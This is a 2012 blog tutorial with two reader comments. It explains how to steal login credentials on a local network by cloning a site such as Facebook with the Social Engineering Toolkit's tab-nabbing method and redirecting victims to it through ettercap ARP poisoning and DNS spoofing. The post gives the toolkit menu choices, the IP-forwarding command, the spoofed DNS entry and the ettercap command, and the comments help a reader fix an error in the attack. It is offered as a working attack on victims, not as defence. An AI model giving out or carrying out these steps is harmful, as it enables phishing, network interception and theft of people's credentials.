Saturday, 22 September 2012

Tab-nabbing with DNS Spoofing using Backtrack


Hello Everyone I am going to tell you how to use tab-nabbing with DNS Spoofing to make it more effective.

First let me tell you what is Tab-nabbing?
Tab-nabbing is the Advance form of Phishing attack. The Tab-nabbing attack method is used when a victim has multiple tabs open. When the user click on the link he/she will get page presenting " please wait while the page loads" (depends upon your coding, but if you are using SET then you don’t have to do coding). When the victim switch tab then the website detects that a different tab is open and rewrites itself with the page you specify. When the victim clicks back on the link he/she will see a login page thinking that they may be logged. When the credentials are inserted attacker get the credential and victim get forwarded on the real website.

When you are using it on the WAN you have to send a link of your website to victim, but if you are using it on LAN then it is necessary that victim hit your web server to do so we use DNS spoofing so that victim click on our web server and our Tab-nabbing page open.


 First we will start Tab-nabbing then we will start DNS Spoofing

Before starting attack checkout your IP address using ifconfig command

Start SET (Social Engineering Tool kit)
give the following commands 
# cd /pentest/exploits/set/
# ./set
now select the write options
hit 1 (Social Engineering Attack)
hit 2 (Web site attack Vector)
hit 4 (tab-nabbing attack method)
hit 2 (site cloner)

Give your IP address and then give url of the website 

Now as we have started tab-nabbing we will move to DNS Spoofing (using ettercap)

Step 1:) Install ettercap (as root )
# apt-get -y install ettercap

Step 2:) Then enable IP forwarding
# echo 1 > /proc/sys/net/ipv4/ip_forward

Step 3:) Then locate etter.dns file
You may find more then one etter.dns select the one I have selected in the Pic. 
# locate etter.dns

Step 4:) Open the file and add entry at the end of the file
# nano /usr/local/share/ettercap/etter.dns
now add the entry at the end of the file 
www.url-of-websitet-to-hack.com            A   your ip address
Step 5:) Now start the spoofing
# ettercap -T -q -M arp:remote -P dns_spoof //

Now whenever victim will type the url (facebook.com in this case ) then he/she will get redirected to attacker machine and Attacker will get all the credential
I have also uploaded a video tutorial of this attack...... Check it out


Posted by at
Labels: , ,

2 comments:

zeeshaan zakariya said...

FATAL: ARP poisoning needs a non empty hosts list.


this shows while i start listening through ettercap

26 November 2012 09:39
Aakar Periwal said...

well I suggest you to check your IP address and mask you have, the demo I have shown is done in LAN with 24 bit mask(i.e 255.255.255.0) if you are getting 32 bit mask (i.e 255.255.255.255) then you have to manually add hosts in ettercap..

you can use command
ettercap -G
to use ettercap in GUI mode

or may be you are using different interface on ettercap that may cause you that error. If this is the case then add
-i interface_name
in the command e.g
ettercap -i eth0 ......
... means rest of the command
to get name of the interface use ifconfig

26 November 2012 10:25

Post a Comment

Subscribe to: Post Comments (Atom)